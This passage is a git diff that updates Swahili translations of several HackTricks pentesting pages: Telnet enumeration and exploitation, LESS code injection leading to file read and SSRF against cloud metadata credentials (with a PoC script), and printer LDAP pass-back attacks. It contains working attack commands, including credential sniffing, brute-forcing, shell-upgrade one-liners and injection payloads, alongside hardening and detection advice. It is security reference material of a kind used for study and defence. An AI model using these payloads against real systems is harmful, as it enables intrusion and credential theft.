Frida/objection vitakatishwa mara moja. -* Uthibitishaji wa Kidokezo (PAC) unatekelezwa kwa mfumo mzima kwenye vifaa vya A12+. Frida ≥16 inashughulikia PAC stripping kwa uwazi — hakikisha unashikilia *frida-server* na zana za Python/CLI zikiwa za kisasa kila wakati toleo jipya kuu la iOS linapotolewa. +* **Modu ya Kufunga** (Mipangilio → Faragha & Usalama) inazuia linker ya dinamik kutoka kupakia maktaba za dinamik zisizosainiwa au zilizotiwa saini na nje. Unapojaribu vifaa ambavyo vinaweza kuwa na modhi hii imewezeshwa hakikisha ime **zimwa** au vikao vyako vya Frida/objection vitakatishwa mara moja. +* Uthibitishaji wa Kidokezo (PAC) unatekelezwa kwa mfumo mzima kwenye vifaa vya A12+. Frida ≥16 inashughulikia PAC stripping kwa uwazi — tu hakikisha *frida-server* na zana za Python/CLI ziko katika hali ya kisasa unapozindua toleo jipya kuu la iOS. ## Marejeleo diff --git a/src/network-services-pentesting/pentesting-telnet.md b/src/network-services-pentesting/pentesting-telnet.md index 39fa54352..b60953441 100644 --- a/src/network-services-pentesting/pentesting-telnet.md +++ b/src/network-services-pentesting/pentesting-telnet.md @@ -3,27 +3,27 @@ {{#include ../banners/hacktricks-training.md}} -## **Basic Information** +## **Taarifa za Msingi** Telnet ni protokali ya mtandao inayowapa watumiaji njia isiyo salama ya kufikia kompyuta kupitia mtandao. -**Default port:** 23 +**Bandari ya Kawaida:** 23 ``` 23/tcp open telnet ``` -## **Uhesabu** +## **Uchambuzi** ### **Kuchukua Bango** ```bash nc -vn 23 ``` -Uchunguzi wote wa kuvutia unaweza kufanywa na **nmap**: +Uainishaji wote wa kuvutia unaweza kufanywa na **nmap**: ```bash nmap -n -sV -Pn --script "*telnet* and safe" -p 23 ``` The script `telnet-ntlm-info.nse` itapata taarifa za NTLM (matoleo ya Windows). -Kutoka kwenye [telnet RFC](https://datatracker.ietf.org/doc/html/rfc854): Katika Protokali ya TELNET kuna "**chaguzi**" mbalimbali ambazo zitaidhinishwa na zinaweza kutumika na muundo wa "**DO, DON'T, WILL, WON'T**" ili kumruhusu mtumiaji na seva kukubaliana kutumia seti ya makubaliano ya kina (au labda tofauti tu) kwa ajili ya muunganisho wao wa TELNET. Chaguzi hizo zinaweza kujumuisha kubadilisha seti ya wahusika, hali ya echo, n.k. +Kutoka kwenye [telnet RFC](https://datatracker.ietf.org/doc/html/rfc854): Katika Protokali ya TELNET kuna "**chaguzi**" mbalimbali ambazo zitaidhinishwa na zinaweza kutumika pamoja na muundo wa "**FANYA, USIFANYE, ITA, HAIWEZEKANI**" ili kumruhusu mtumiaji na seva kukubaliana kutumia seti ya makubaliano ya kina zaidi (au labda tofauti tu) kwa ajili ya muunganisho wao wa TELNET. Chaguzi hizo zinaweza kujumuisha kubadilisha seti ya wahusika, hali ya echo, n.k. **Ninajua inawezekana kuhesabu chaguzi hizi lakini sijui jinsi, hivyo nijulishe kama unajua jinsi.** @@ -69,15 +69,15 @@ Command: msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_version; set RHOS ``` ### Recent Vulnerabilities (2022-2025) -* **CVE-2024-45698 – D-Link Wi-Fi 6 routers (DIR-X4860)**: Huduma ya Telnet iliyojengwa ndani ilikubali akreditivu zilizowekwa kwa nguvu na ikashindwa kusafisha ingizo, ikiruhusu RCE isiyoidhinishwa kama root kupitia amri zilizoundwa kwenye bandari 23. Imefanyiwa marekebisho katika firmware ≥ 1.04B05. +* **CVE-2024-45698 – D-Link Wi-Fi 6 routers (DIR-X4860)**: Huduma ya Telnet iliyojengwa ndani ilikubali akauti za hard-coded na ikashindwa kusafisha ingizo, ikiruhusu RCE isiyoidhinishwa kama root kupitia amri zilizoundwa kwenye bandari 23. Imerekebishwa katika firmware ≥ 1.04B05. * **CVE-2023-40478 – NETGEAR RAX30**: Overflow ya buffer inayotegemea stack katika amri ya Telnet CLI `passwd` inaruhusu mshambuliaji wa karibu kupita uthibitisho na kutekeleza msimbo wa kawaida kama root. -* **CVE-2022-39028 – GNU inetutils telnetd**: Mfuatano wa byte mbili (`0xff 0xf7` / `0xff 0xf8`) unachochea dereference ya pointer ya NULL ambayo inaweza kusababisha `telnetd` kuanguka, na kusababisha DoS ya kudumu baada ya kuanguka kadhaa. +* **CVE-2022-39028 – GNU inetutils telnetd**: Mfuatano wa byte mbili (`0xff 0xf7` / `0xff 0xf8`) unachochea dereference ya NULL-pointer ambayo inaweza kusababisha `telnetd` kuanguka, na kusababisha DoS ya kudumu baada ya kuanguka kadhaa. -Keep these CVEs in mind during vulnerability triage—if the target is running an un-patched firmware or legacy inetutils Telnet daemon you may have a straight-forward path to code-execution or a disruptive DoS. +Hifadhi hizi CVE akilini wakati wa uchambuzi wa udhaifu—ikiwa lengo linaendesha firmware isiyo na patch au daemon ya Telnet ya zamani ya inetutils unaweza kuwa na njia rahisi ya kutekeleza msimbo au DoS inayosababisha usumbufu. ### Sniffing Credentials & Man-in-the-Middle -Telnet transmits everything, including credentials, in **clear-text**. Njia mbili za haraka za kuziteka: +Telnet inapeleka kila kitu, ikiwa ni pamoja na akauti, katika **clear-text**. Njia mbili za haraka za kuziteka: ```bash # Live capture with tcpdump (print ASCII) sudo tcpdump -i eth0 -A 'tcp port 23 and not src host $(hostname -I | cut -d" " -f1)' @@ -85,7 +85,7 @@ sudo tcpdump -i eth0 -A 'tcp port 23 and not src host $(hostname -I | cut -d" " # Wireshark display filter tcp.port == 23 && (telnet.data || telnet.option) ``` -Kwa MITM hai, changanya ARP spoofing (mfano `arpspoof`/`ettercap`) na vichujio vya kunusa sawa ili kukusanya nywila kwenye mitandao iliyowekwa. +Kwa MITM hai, changanya ARP spoofing (mfano `arpspoof`/`ettercap`) na vichujio vya kunusa sawa ili kukusanya nywila kwenye mitandao iliyopangwa. ### Automated Brute-force / Password Spraying ```bash @@ -100,7 +100,7 @@ medusa -M telnet -h targets.txt -U users.txt -P passwords.txt -t 6 -f ``` Most IoT botnets (Mirai variants) bado zinachunguza port 23 kwa kamusi ndogo za akidi za default—kuakisi mantiki hiyo kunaweza kutambua haraka vifaa dhaifu. -### Exploitation & Post-Exploitation +### Ukatili & Baada ya Ukatili Metasploit ina moduli kadhaa za manufaa: @@ -109,16 +109,16 @@ Metasploit ina moduli kadhaa za manufaa: * `auxiliary/scanner/telnet/telnet_encrypt_overflow` – RCE dhidi ya Solaris 9/10 Telnet iliyo hatarini (usimamizi wa chaguo ENCRYPT). * `exploit/linux/mips/netgear_telnetenable` – inaruhusu huduma ya telnet kwa pakiti iliyoundwa kwenye router nyingi za NETGEAR. -Baada ya kupata shell kumbuka kwamba **TTYs kwa kawaida ni za kijinga**; sasisha kwa `python -c 'import pty;pty.spawn("/bin/bash")'` au tumia [HackTricks TTY tricks](/generic-hacking/reverse-shells/full-ttys.md). +Baada ya kupata shell kumbuka kwamba **TTYs mara nyingi ni za kijinga**; boresha kwa `python -c 'import pty;pty.spawn("/bin/bash")'` au tumia [HackTricks TTY tricks](/generic-hacking/reverse-shells/full-ttys.md). -### Hardening & Detection (Blue team corner) +### Kuimarisha & Ugunduzi (Kona ya timu ya Blue) 1. Prefer SSH na uondoe huduma ya Telnet kabisa. -2. Ikiwa Telnet inahitajika, iunganishe tu na VLANs za usimamizi, enforce ACLs na ufunge daemon na TCP wrappers (`/etc/hosts.allow`). -3. Badilisha utekelezaji wa zamani wa `telnetd` na `ssl-telnet` au `telnetd-ssl` kuongeza usimbaji wa usafirishaji, lakini **hii inalinda tu data-in-transit—kukisia nywila bado ni rahisi**. +2. Ikiwa Telnet inahitajika, iunganishe tu na VLAN za usimamizi, enforce ACLs na ufunge daemon na TCP wrappers (`/etc/hosts.allow`). +3. Badilisha utekelezaji wa zamani wa `telnetd` na `ssl-telnet` au `telnetd-ssl` kuongeza usimbuaji wa usafirishaji, lakini **hii inalinda tu data-in-transit—kukisia nywila bado kuna urahisi**. 4. Fuata trafiki ya nje kuelekea port 23; makosa mara nyingi huzaa shells za kurudi kupitia Telnet ili kupita vichujio vya egress vya HTTP kali. -## References +## Marejeleo * D-Link Advisory – CVE-2024-45698 Critical Telnet RCE. * NVD – CVE-2022-39028 inetutils `telnetd` DoS. diff --git a/src/pentesting-web/less-code-injection-ssrf.md b/src/pentesting-web/less-code-injection-ssrf.md index ee23b0206..5b74acbea 100644 --- a/src/pentesting-web/less-code-injection-ssrf.md +++ b/src/pentesting-web/less-code-injection-ssrf.md @@ -6,21 +6,21 @@ LESS ni pre-processor maarufu wa CSS inayoongeza mabadiliko, mixins, kazi na amri yenye nguvu `@import`. Wakati wa uundaji injini ya LESS itafanya **kupata rasilimali zilizotajwa katika amri za `@import`** na kuingiza ("inline") maudhui yao katika CSS inayotokana wakati chaguo la `(inline)` linapotumika. -Wakati programu inachanganya **ingizo linalodhibitiwa na mtumiaji** katika mfuatano ambao baadaye unachambuliwa na mkusanyiko wa LESS, mshambuliaji anaweza **kuiingiza msimbo wa LESS wa kiholela**. Kwa kutumia `@import (inline)` mshambuliaji anaweza kulazimisha seva kupata: +Wakati programu inachanganya **ingizo linalodhibitiwa na mtumiaji** katika mfuatano ambao baadaye unachambuliwa na mkusanyiko wa LESS, mshambuliaji anaweza **kuingiza msimbo wa LESS wa kiholela**. Kwa kutumia `@import (inline)` mshambuliaji anaweza kulazimisha seva kupata: * Faili za ndani kupitia itifaki ya `file://` (ufichuzi wa taarifa / Ujumuishaji wa Faili za Ndani). * Rasilimali za mbali kwenye mitandao ya ndani au huduma za metadata za wingu (SSRF). -Teknik hii imeonekana katika bidhaa halisi kama **SugarCRM ≤ 14.0.0** (`/rest/v10/css/preview` endpoint). +Teknolojia hii imeonekana katika bidhaa halisi kama **SugarCRM ≤ 14.0.0** (`/rest/v10/css/preview` endpoint). ## Exploitation 1. Tambua parameter ambayo imeingizwa moja kwa moja ndani ya mfuatano wa mtindo unaoshughulikiwa na injini ya LESS (mfano `?lm=` katika SugarCRM). -2. Funga taarifa ya sasa na uingize amri mpya. Msingi wa kawaida ni: +2. Funga taarifa ya sasa na ingiza amri mpya. Msingi wa kawaida ni: * `;` – inamaliza tamko la awali. * `}` – inafunga block ya awali (ikiwa inahitajika). 3. Tumia `@import (inline) '';` kusoma rasilimali za kiholela. -4. Kwa hiari, ingiza **alama** (`data:` URI) baada ya kuagiza ili kurahisisha uchimbaji wa maudhui yaliyopatikana kutoka kwa CSS iliyokusanywa. +4. Kwa hiari ingiza **alama** (`data:` URI) baada ya kuagiza ili kurahisisha uchimbaji wa maudhui yaliyopatikana kutoka kwa CSS iliyokusanywa. ### Local File Read ``` @@ -34,7 +34,7 @@ Maudhui ya `/etc/passwd` yataonekana katika jibu la HTTP kabla ya alama ya `@@EN 1; @import (inline) "http://169.254.169.254/latest/meta-data/iam/security-credentials/"; @import (inline) 'data:text/plain,@@END@@'; // ``` -### PoC ya Kiotomatiki (mfano wa SugarCRM) +### PoC ya Otomatiki (mfano wa SugarCRM) ```bash #!/usr/bin/env bash # Usage: ./exploit.sh http://target/sugarcrm/ /etc/passwd @@ -49,15 +49,15 @@ sed -n 's/.*@@END@@\(.*\)/\1/p' ``` ## Detection -* Angalia majibu ya `.less` au `.css` yanayozalishwa kwa dinamik ambayo yana vigezo vya swali visivyosafishwa. -* Wakati wa ukaguzi wa msimbo, tafuta ujenzi kama `"@media all { .preview { ... ${userInput} ... } }"` unaopitishwa kwa kazi za kuunda LESS. +* Angalia majibu ya `.less` au `.css` yanayozalishwa kwa dinamikali yanayojumuisha vigezo vya uchunguzi visivyo safishwa. +* Wakati wa ukaguzi wa msimbo, tafuta ujenzi kama `"@media all { .preview { ... ${userInput} ... } }"` uliopitishwa kwa kazi za LESS render. * Jaribio la kutumia mara nyingi linajumuisha `@import`, `(inline)`, `file://`, `http://169.254.169.254`, n.k. ## Mitigations -* Usipitishwe data zisizoaminika kwa mhariri wa LESS. -* Ikiwa thamani za dinamik zinahitajika, safisha/safisha vizuri (kwa mfano, punguza kwa alama za nambari, orodha za ruhusa). -* Zima, inapowezekana, uwezo wa kutumia uagizaji wa `(inline)`, au punguza protokali zinazoruhusiwa kuwa `https`. +* Usipitishwe data isiyoaminika kwa LESS compiler. +* Ikiwa thamani za dinamikali zinahitajika, safisha/vitakasa vizuri (mfano, punguza kwa alama za nambari, orodha za kibali). +* Zima, inapowezekana, uwezo wa kutumia `(inline)` imports, au punguza protokali zinazoruhusiwa kuwa `https`. * Hifadhi utegemezi kuwa wa kisasa – SugarCRM ilirekebisha tatizo hili katika toleo 13.0.4 na 14.0.1. ## Real-World Cases diff --git a/src/pentesting-web/ssrf-server-side-request-forgery/ssrf-vulnerable-platforms.md b/src/pentesting-web/ssrf-server-side-request-forgery/ssrf-vulnerable-platforms.md index 15a552d7f..0633719cf 100644 --- a/src/pentesting-web/ssrf-server-side-request-forgery/ssrf-vulnerable-platforms.md +++ b/src/pentesting-web/ssrf-server-side-request-forgery/ssrf-vulnerable-platforms.md @@ -1,4 +1,4 @@ -# Mifumo Iliyoathirika ya SSRF +# Mifumo Ilioathirika ya SSRF {{#include ../../banners/hacktricks-training.md}} diff --git a/src/windows-hardening/active-directory-methodology/ad-information-in-printers.md b/src/windows-hardening/active-directory-methodology/ad-information-in-printers.md index d27c3fcf5..c67b4e851 100644 --- a/src/windows-hardening/active-directory-methodology/ad-information-in-printers.md +++ b/src/windows-hardening/active-directory-methodology/ad-information-in-printers.md @@ -7,7 +7,7 @@ Hii ni kwa sababu mshambuliaji anaweza **kudanganya printa kujiunga na seva ya L Pia, printa kadhaa zitakuwa na **kumbukumbu za majina ya watumiaji** au zinaweza hata kuwa na uwezo wa **kupakua majina yote ya watumiaji** kutoka kwa Kituo cha Kikoa. -Habari hii **nyeti** na **ukosefu wa usalama** wa kawaida hufanya printa kuwa za kuvutia sana kwa washambuliaji. +Habari hii **nyeti** na **ukosefu wa usalama** wa kawaida inafanya printa kuwa za kuvutia sana kwa washambuliaji. Baadhi ya blogu za utangulizi kuhusu mada hii: @@ -28,7 +28,7 @@ Baadhi ya blogu za utangulizi kuhusu mada hii: ```bash sudo nc -k -v -l -p 389 # LDAPS → 636 (or 3269) ``` -Small/old MFPs zinaweza kutuma *simple-bind* rahisi katika maandiko wazi ambayo netcat inaweza kukamata. Vifaa vya kisasa kwa kawaida hufanya uchunguzi wa kutokujulikana kwanza na kisha kujaribu kuunganisha, hivyo matokeo yanatofautiana. +Small/old MFPs zinaweza kutuma *simple-bind* rahisi katika maandiko wazi ambayo netcat inaweza kukamata. Vifaa vya kisasa kawaida hufanya uchunguzi wa kutokujulikana kwanza na kisha kujaribu kuunganisha, hivyo matokeo yanatofautiana. ### Method 2 – Full Rogue LDAP server (recommended) @@ -52,10 +52,10 @@ Pass-back *sio* suala la nadharia – wauzaji wanaendelea kuchapisha taarifa kat ### Xerox VersaLink – CVE-2024-12510 & CVE-2024-12511 -Firmware ≤ 57.69.91 ya Xerox VersaLink C70xx MFPs iliruhusu admin aliyeidhinishwa (au mtu yeyote wakati akiba za kawaida zipo) kufanya: +Firmware ≤ 57.69.91 ya Xerox VersaLink C70xx MFPs iliruhusu admin aliyeidhinishwa (au mtu yeyote wakati akiba za kawaida zinabaki) kufanya: -* **CVE-2024-12510 – LDAP pass-back**: kubadilisha anwani ya seva ya LDAP na kuanzisha utafutaji, na kusababisha kifaa kuvuja akiba ya Windows iliyowekwa kwa mwenye shambulio. -* **CVE-2024-12511 – SMB/FTP pass-back**: suala sawa kupitia *scan-to-folder* maeneo, kuvuja NetNTLMv2 au FTP akiba za wazi. +* **CVE-2024-12510 – LDAP pass-back**: kubadilisha anwani ya seva ya LDAP na kuanzisha utafutaji, ikisababisha kifaa kuvuja taarifa za kuingia za Windows zilizowekwa kwa mwenye shambulio. +* **CVE-2024-12511 – SMB/FTP pass-back**: suala sawa kupitia *scan-to-folder* maeneo, ikivuja NetNTLMv2 au FTP akiba ya wazi ya taarifa za kuingia. Msikilizaji rahisi kama: ```bash